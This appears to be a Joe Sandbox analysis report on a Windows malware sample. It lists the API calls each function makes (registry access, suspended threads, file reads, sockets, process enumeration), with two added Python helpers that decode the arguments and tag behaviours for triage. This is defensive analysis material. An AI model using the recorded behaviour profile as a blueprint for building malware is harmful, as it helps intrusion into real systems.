                                                                             • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventObjectSingleWait
                                                                            • String ID: d
                                                                            • API String ID: 2857295742-2564639436
                                                                            • Opcode ID: 4070b5fb879864a3c6c343a0292bb697a6005300dc2195d5f0f942cf2fddb6c8
                                                                            • Instruction ID: a0d6dd7e9274af8af0e716655ec2a942ecbbff62d8221c620a146e845e45dde5
                                                                            • Opcode Fuzzy Hash: 4070b5fb879864a3c6c343a0292bb697a6005300dc2195d5f0f942cf2fddb6c8
                                                                            • Instruction Fuzzy Hash: 34515071A00A14EBEB18DF84CADAB6DB776FBD0309F1482ADD0166F691C7399A41DF40
                                                                            APIs
                                                                            • lstrcmpiW.KERNEL32(?,-00832F28,00000000,?,?,?,?,?), ref: 007C278C
                                                                            • _memset.LIBCMT ref: 007C27B1
                                                                            • lstrcpyW.KERNEL32(?,-00832F28,?,?,?,?,?,?,?), ref: 007C27CF
                                                                              • Part of subcall function 007C1C60: _wcsrchr.LIBCMT ref: 007C1C6C
                                                                            • lstrcpyW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 007C2815
                                                                              • Part of subcall function 007C2A80: construct.LIBCPMTD ref: 007C2B09
                                                                            • StrCatW.SHLWAPI(00000000,007F2714), ref: 007C2863
                                                                            • StrCatW.SHLWAPI(00000000,?), ref: 007C2874
                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 007C28D6
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C28E8
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C28F8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                             • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrcpy$CloseFreeHandleLocalNextProcess32_memset_wcsrchrconstructlstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 3449763073-0
                                                                            • Opcode ID: 8f46c1afa44775dd38816e99fcb9774df18b28d97ba747684e6a488afa915269
                                                                            • Instruction ID: e3d72badf7a05c3d48163bb8790d670a78204ac0ac95b2a5dff49fd5a7a100c0
                                                                            • Opcode Fuzzy Hash: 8f46c1afa44775dd38816e99fcb9774df18b28d97ba747684e6a488afa915269
                                                                            • Instruction Fuzzy Hash: FE412C72D04218DBDB24DB64DC88FDDB7B5BF98300F00859CE50AB6251EB799A85CF54
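The function entries above list raw API calls with hex arguments, which an analyst has to decode by hand (80000001 is HKEY_CURRENT_USER, a CreateThread flag of 00000004 is CREATE_SUSPENDED, setsockopt level 0000FFFF/option 00000080 is SOL_SOCKET/SO_LINGER). The following is an added example, not Joe Sandbox code and not part of the report: a small Python triage helper that parses the "APIs" blocks in exactly the textual form shown in this listing, decodes the numeric arguments whose meaning is fixed by the Win32 and Winsock headers, and tags each function with the behaviour its call set suggests. The decoder table, the behaviour rules and their labels are the example's own assumptions; the sample input is copied from three of the entries above so it runs offline.

```python
"""Triage helper for Joe Sandbox-style per-function API listings.

Added example, not Joe Sandbox code. It parses lines such as
    • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 007C47A7
decodes well-known constant arguments, and labels each function's behaviour.
"""
import re
from typing import Dict, List, Optional, Set, Tuple

# One bullet line of an "APIs" block. The optional prefix covers the indented
# "Part of subcall function XXXX:" lines the sandbox inlines under a caller.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

HKEY = {"80000001": "HKEY_CURRENT_USER", "80000002": "HKEY_LOCAL_MACHINE"}

# (API name, zero-based argument index) -> {hex value as printed: symbolic name}.
# Assumed table: only values whose meaning is fixed by the SDK headers are listed.
ARG_DECODERS: Dict[Tuple[str, int], Dict[str, str]] = {
    ("RegOpenKeyW", 0): HKEY,
    ("RegGetValueW", 0): HKEY,
    ("RegSetValueExW", 3): {"00000001": "REG_SZ", "00000003": "REG_BINARY", "00000004": "REG_DWORD"},
    ("RegGetValueW", 3): {"00000002": "RRF_RT_REG_SZ", "00000008": "RRF_RT_REG_BINARY"},
    ("LocalAlloc", 0): {"00000000": "LMEM_FIXED", "00000040": "LPTR"},
    ("CreateEventW", 1): {"00000000": "auto-reset", "00000001": "manual-reset"},
    ("CreateThread", 4): {"00000000": "run immediately", "00000004": "CREATE_SUSPENDED"},
    ("VirtualFree", 2): {"00004000": "MEM_DECOMMIT", "00008000": "MEM_RELEASE"},
    ("setsockopt", 1): {"0000FFFF": "SOL_SOCKET"},
    ("setsockopt", 2): {"00000080": "SO_LINGER"},
    ("shutdown", 1): {"00000000": "SD_RECEIVE", "00000001": "SD_SEND", "00000002": "SD_BOTH"},
}

# Required API set -> behaviour label (assumed labels). A function gets a label
# when every API in the set appears in its block, subcall lines included.
BEHAVIOUR_RULES: List[Tuple[Set[str], str]] = [
    ({"RegOpenKeyW", "RegSetValueExW"}, "registry write"),
    ({"RegGetValueW"}, "registry read"),
    ({"und_memcpy", "VirtualProtect"}, "in-memory code staging (copy then reprotect)"),
    ({"Process32NextW", "lstrcmpiW"}, "process-name search"),
    ({"CreateThread", "ResumeThread"}, "suspended thread start"),
    ({"shutdown", "closesocket"}, "socket teardown"),
]


def parse_call(line: str) -> Optional[dict]:
    """Parse one API bullet line; return None for any other line."""
    m = API_LINE.match(line)
    if not m:
        return None
    args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
    decoded = {}
    for i, a in enumerate(args):
        name = ARG_DECODERS.get((m["api"], i), {}).get(a.upper())
        if name:
            decoded[i] = name
    return {"api": m["api"], "module": m["module"], "args": args, "decoded": decoded, "ref": m["ref"]}


def parse_listing(text: str) -> List[List[dict]]:
    """Split the listing into functions at each 'APIs' header and parse the bullets under it."""
    functions: List[List[dict]] = []
    current: Optional[List[dict]] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = []
            functions.append(current)
            continue
        if current is None:
            continue
        call = parse_call(line)
        if call:
            current.append(call)
        elif line in ("Strings", "Memory Dump Source"):  # next block of the same entry
            current = None
    return [f for f in functions if f]


def classify(calls: List[dict]) -> List[str]:
    """Return the behaviour labels whose required API set is covered by this function."""
    names = {c["api"] for c in calls}
    return [label for needed, label in BEHAVIOUR_RULES if needed <= names]


# Constructed sample: three "APIs" blocks copied from the listing above.
SAMPLE_LISTING = """
APIs
• __snwprintf.LIBCMT ref: 007C478F
• RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 007C47A7
• RegSetValueExW.ADVAPI32(?,{C2AC4D96-85E6-4EFA-B33C-9FC0845F6FAD},00000000,00000003,?,?), ref: 007C47CA
• RegCloseKey.ADVAPI32(?), ref: 007C47D8
Strings
APIs
• setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 007C72DB
• _memset.LIBCMT ref: 007C732B
• shutdown.WS2_32(?,00000002), ref: 007C7595
• closesocket.WS2_32(?), ref: 007C759F
  • Part of subcall function 007E0CD0: ___crtGetLocaleInfoEx.LIBCMTD ref: 007E0CED
Strings
APIs
• lstrcmpiW.KERNEL32(?,-00832F28,00000000,?,?,?,?,?), ref: 007C278C
• Process32NextW.KERNEL32(00000000,0000022C), ref: 007C28D6
• CloseHandle.KERNEL32(00000000), ref: 007C28E8
Memory Dump Source
"""

if __name__ == "__main__":
    for n, calls in enumerate(parse_listing(SAMPLE_LISTING), 1):
        print(f"function {n}: {classify(calls)}")
        for c in calls:
            print(f"  {c['api']}@{c['ref']} decoded={c['decoded']}")
```

The parser deliberately stops at the "Strings" and "Memory Dump Source" labels so that string xref bullets are never mistaken for calls, and it keeps inlined subcall lines because the sandbox attributes them to the caller. The rules are intentionally coarse: a "registry write" under HKEY_CURRENT_USER is a lead to check against the report's persistence findings, not a verdict on its own.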
                                                                            APIs
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D7287
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D72A7
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 007D72BF
                                                                            • CreateThread.KERNEL32(00000000,00000000,00000000,?,00000004,00000000), ref: 007D72DE
                                                                            • ResumeThread.KERNEL32(00000000), ref: 007D730C
                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 007D7361
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D738D
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D73AD
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 007D73C5
                                                                            • CreateThread.KERNEL32(00000000,00000000,00000000,?,00000004,00000000), ref: 007D73E4
                                                                            • ResumeThread.KERNEL32(00000000), ref: 007D7412
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleThread$EventResume$ObjectSingleWait
                                                                            • String ID: d
                                                                            • API String ID: 738346648-2564639436
                                                                            • Opcode ID: 23bfbcaab8414962cfeb4dcb9a5e8aa4019a76a326f1f40112e4f9a26fe66591
                                                                            • Instruction ID: 873c4d394bab26dc0bf5f759b6a4c3ce6cd1a65fdc8dd66f6fbeb0a931d7e698
                                                                            • Opcode Fuzzy Hash: 23bfbcaab8414962cfeb4dcb9a5e8aa4019a76a326f1f40112e4f9a26fe66591
                                                                            • Instruction Fuzzy Hash: 0531C674E04248DFDB18CF94C888B9CFBB1BF48315F24C219E9156B395D778A886CB44
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,00000014), ref: 007DC786
                                                                            • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000004,00000000), ref: 007DC7A9
                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 007DC7C0
                                                                            • ResumeThread.KERNEL32(00000000), ref: 007DC7FE
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DC812
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DC82C
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DC836
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleLocalThread$AllocEventFreeResume
                                                                            • String ID:
                                                                            • API String ID: 4097846125-0
                                                                            • Opcode ID: ac41cb95e7a5fc8b2f73a3e7c49a81991ba509475a595c33fb85da7b2f7caf26
                                                                            • Instruction ID: 70cde24a1fd8b24cfba68e6fefc4e555de8ffd9821dca2e2265912a77112e28c
                                                                            • Opcode Fuzzy Hash: ac41cb95e7a5fc8b2f73a3e7c49a81991ba509475a595c33fb85da7b2f7caf26
                                                                            • Instruction Fuzzy Hash: 6D213B79E00208FFDB04DFA4DC49F9DBBB5AB48301F208559FA09AB391D778AA41DB54
                                                                            APIs
                                                                            • __snwprintf.LIBCMT ref: 007CA113
                                                                            • RegGetValueW.ADVAPI32(80000001,?,-00008688,00000008,00000000,00000000,00000000), ref: 007CA148
                                                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 007CA158
                                                                            • RegGetValueW.ADVAPI32(80000001,?,-00008688,00000008,00000000,00000000,00000000), ref: 007CA189
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CA1A4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LocalValue$AllocFree__snwprintf
                                                                            • String ID: SOFTWARE\%s
                                                                            • API String ID: 297434584-297323700
                                                                            • Opcode ID: 576d250d501a9a7efb7af515da6b404f1d2cbadaf4f9e8a48df79d69f47af4c7
                                                                            • Instruction ID: f25bc20bcd34d336078f178333630b84797d01d17d416b99257a280735bf4bb1
                                                                            • Opcode Fuzzy Hash: 576d250d501a9a7efb7af515da6b404f1d2cbadaf4f9e8a48df79d69f47af4c7
                                                                            • Instruction Fuzzy Hash: 3F21127560020CFFEB14CF94CC49FAEB7B8FB84705F14855CBA05AB280D675AE449B95
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 007DF09C
                                                                            • GetFileSize.KERNEL32(000000FF,00000000), ref: 007DF0B1
                                                                            • LocalAlloc.KERNEL32(00000040,000000FF), ref: 007DF0C6
                                                                            • ReadFile.KERNEL32(000000FF,00000000,000000FF,?,00000000), ref: 007DF0E7
                                                                            • CloseHandle.KERNEL32(000000FF), ref: 007DF0FD
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DF114
                                                                            • CloseHandle.KERNEL32(000000FF), ref: 007DF11E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$CloseHandleLocal$AllocCreateFreeReadSize
                                                                            • String ID:
                                                                            • API String ID: 2550598358-0
                                                                            • Opcode ID: 523c218f5f5a70a9ef6a6c5723bd44c62c8d4a88217d473316d5653a66c79189
                                                                            • Instruction ID: 5e615e7b86b7e84528f5c59e5ce48d49ff596080ee0292cbc10b90cea6705fdf
                                                                            • Opcode Fuzzy Hash: 523c218f5f5a70a9ef6a6c5723bd44c62c8d4a88217d473316d5653a66c79189
                                                                            • Instruction Fuzzy Hash: 94214D75A00208FBCB14DFE4DC49FAEB775FB48700F108555F516A72D0DA38AA41CB54
                                                                            APIs
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 007E10EA
                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 007E1149
                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 007E117D
                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 007E11A0
                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 007E11B8
                                                                            • Sleep.KERNEL32(00000BB8), ref: 007E11D1
                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 007E11EB
                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 007E1203
                                                                            • setsockopt.WS2_32(00000000,0000FFFF,00000008,00000001,00000004), ref: 007E126B
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 007E1281
                                                                            • LocalAlloc.KERNEL32(00000040,00000004), ref: 007E1298
                                                                            • CreateThread.KERNEL32(00000000,00000000,007E1580,00000000,00000000,00000000), ref: 007E12C4
                                                                            • GetTickCount.KERNEL32 ref: 007E12E1
                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 007E1309
                                                                            • shutdown.WS2_32(00000000,00000002), ref: 007E13D7
                                                                            • closesocket.WS2_32(00000000), ref: 007E13E1
                                                                            • SetEvent.KERNEL32(00000000), ref: 007E13F2
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007E13FE
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1419
                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 007E14D7
                                                                            • SetEvent.KERNEL32(00000000), ref: 007E14E8
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007E14F4
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1504
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E151B
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1534
                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 007E154E
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1558
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1568
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1572
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ObjectSingleWait$CloseHandle$Event$Create$AllocCountLocalMutexReleaseSleepThreadTickclosesocketsetsockoptshutdown
                                                                            • String ID:
                                                                            • API String ID: 2693238558-0
                                                                            • Opcode ID: 48f419d885d60143a0f423bc19ded478ab8114b16e3291fc550c30756ca256bc
                                                                            • Instruction ID: 6c5ca28043ac7474db8266914e70f2f13ed212be7fe291a743bb6b06c9ec8d6b
                                                                            • Opcode Fuzzy Hash: 48f419d885d60143a0f423bc19ded478ab8114b16e3291fc550c30756ca256bc
                                                                            • Instruction Fuzzy Hash: 06115B75901348DBDB14CFA1EC4EBAE7771BB88305F60C908E102A62A0CB7D8944CF98
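Every argument in the API records above is printed as a raw hex DWORD, so the reader has to look up what 80000001, 00000008 or 0000FFFF mean for each call before a record says anything. The Python below is an added example, not part of the Joe Sandbox report or of the sample's own code: it parses lines in the report's "API.MODULE(args), ref: ADDR" format and names the arguments whose meaning is fixed by the public Win32 and Winsock headers (registry roots and RRF_RT_* flags for RegGetValueW, access/share/disposition/attribute values for CreateFileW, SOL_SOCKET option names for setsockopt, CREATE_SUSPENDED for CreateThread, LMEM_ZEROINIT for LocalAlloc, millisecond timeouts for Sleep and WaitForSingleObject). The sample lines are copied from the records on this page; the decoder tables are deliberately limited to the constants those records use plus a few close neighbours, and any value a table does not cover is printed back as hex rather than guessed.

```python
import re
from typing import Callable, Dict, List, Optional, Tuple, Union

# Constructed sample: lines copied from the Joe Sandbox function records above.
SAMPLE_LINES = [
    "• RegGetValueW.ADVAPI32(80000001,?,-00008688,00000008,00000000,00000000,00000000), ref: 007CA148",
    "• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 007DF09C",
    "• setsockopt.WS2_32(00000000,0000FFFF,00000008,00000001,00000004), ref: 007E126B",
    "• CreateThread.KERNEL32(00000000,00000000,00000000,?,00000004,00000000), ref: 007D72DE",
    "• Sleep.KERNEL32(00000BB8), ref: 007E11D1",
    "• GetTickCount.KERNEL32 ref: 007E12E1",
]

# "• API.MODULE(arg,...), ref: ADDR"; no argument list for e.g. GetTickCount or __snwprintf.
LINE_RE = re.compile(r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)"
                     r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

Arg = Union[int, str, None]        # hex value, literal string, or None for '?' (unrecovered)
Decoder = Callable[[int, List[Arg]], str]

def _hex(v: int) -> str:
    return f"-0x{-v:X}" if v < 0 else f"0x{v:X}"

def _enum(table: Dict[int, str]) -> Decoder:
    return lambda v, _args: table.get(v, _hex(v))

def _flags(table: Dict[int, str]) -> Decoder:
    def decode(v: int, _args: List[Arg]) -> str:
        names = [name for bit, name in table.items() if v & bit]
        rest = v & ~sum(table)          # table keys are single bits, so sum() == OR
        return "|".join(names + ([_hex(rest)] if rest else [])) or "0"
    return decode

_ms: Decoder = lambda v, _args: "INFINITE" if v == 0xFFFFFFFF else f"{v} ms"

def _sockopt(v: int, args: List[Arg]) -> str:
    # optname only has a fixed meaning when the level (argument 1) is SOL_SOCKET
    return SOL_SOCKET_OPTS.get(v, _hex(v)) if len(args) > 1 and args[1] == 0xFFFF else _hex(v)

# Win32 / Winsock constants as defined in the public SDK headers.
HKEYS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
RRF = {0x1: "RRF_RT_REG_NONE", 0x2: "RRF_RT_REG_SZ", 0x4: "RRF_RT_REG_EXPAND_SZ", 0x8: "RRF_RT_REG_BINARY",
       0x10: "RRF_RT_REG_DWORD", 0x20: "RRF_RT_REG_MULTI_SZ", 0x40: "RRF_RT_REG_QWORD",
       0x10000000: "RRF_NOEXPAND", 0x20000000: "RRF_ZEROONFAILURE"}
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE", 0x20000000: "GENERIC_EXECUTE"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = {0x80: "FILE_ATTRIBUTE_NORMAL", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE", 0x40000000: "FILE_FLAG_OVERLAPPED"}
THREAD_FLAGS = {0x4: "CREATE_SUSPENDED", 0x10000: "STACK_SIZE_PARAM_IS_A_RESERVATION"}
LMEM = {0x2: "LMEM_MOVEABLE", 0x40: "LMEM_ZEROINIT"}
SOCK_LEVELS = {0xFFFF: "SOL_SOCKET", 6: "IPPROTO_TCP"}
SOL_SOCKET_OPTS = {0x4: "SO_REUSEADDR", 0x8: "SO_KEEPALIVE", 0x20: "SO_BROADCAST", 0x80: "SO_LINGER",
                   0x1001: "SO_SNDBUF", 0x1002: "SO_RCVBUF", 0x1005: "SO_SNDTIMEO", 0x1006: "SO_RCVTIMEO"}

# (API name, zero-based argument index) -> decoder for that parameter.
DECODERS: Dict[Tuple[str, int], Decoder] = {
    ("RegGetValueW", 0): _enum(HKEYS), ("RegGetValueW", 3): _flags(RRF),
    ("CreateFileW", 1): _flags(ACCESS), ("CreateFileW", 2): _flags(SHARE),
    ("CreateFileW", 4): _enum(DISPOSITION), ("CreateFileW", 5): _flags(FILE_FLAGS),
    ("CreateThread", 4): _flags(THREAD_FLAGS), ("LocalAlloc", 0): _flags(LMEM),
    ("setsockopt", 1): _enum(SOCK_LEVELS), ("setsockopt", 2): _sockopt,
    ("Sleep", 0): _ms, ("WaitForSingleObject", 1): _ms,
}

def parse_arg(token: str) -> Arg:
    token = token.strip()
    if token == "?":
        return None
    try:
        return int(token, 16)          # also accepts the plugin's leading '-'
    except ValueError:
        return token                   # literal string argument, e.g. KERNEL32.DLL

def decode_call(line: str) -> Optional[dict]:
    m = LINE_RE.match(line)            # None for headings and other non-call lines
    if not m:
        return None
    api = m["api"]
    raw = [parse_arg(t) for t in m["args"].split(",")] if m["args"] else []
    decoded: List[str] = []
    for i, value in enumerate(raw):
        if value is None:
            decoded.append("?")
        elif isinstance(value, str):
            decoded.append(value)
        else:
            fn = DECODERS.get((api, i))
            decoded.append(fn(value, raw) if fn else _hex(value))
    return {"api": api, "module": m["module"], "ref": m["ref"], "raw": raw, "args": decoded}

def summarize(lines: List[str]) -> List[str]:
    calls = [c for c in map(decode_call, lines) if c is not None]
    return [f"{c['ref']}  {c['api']}({', '.join(c['args'])})" for c in calls]

if __name__ == "__main__":
    for row in summarize(SAMPLE_LINES):
        print(row)
```

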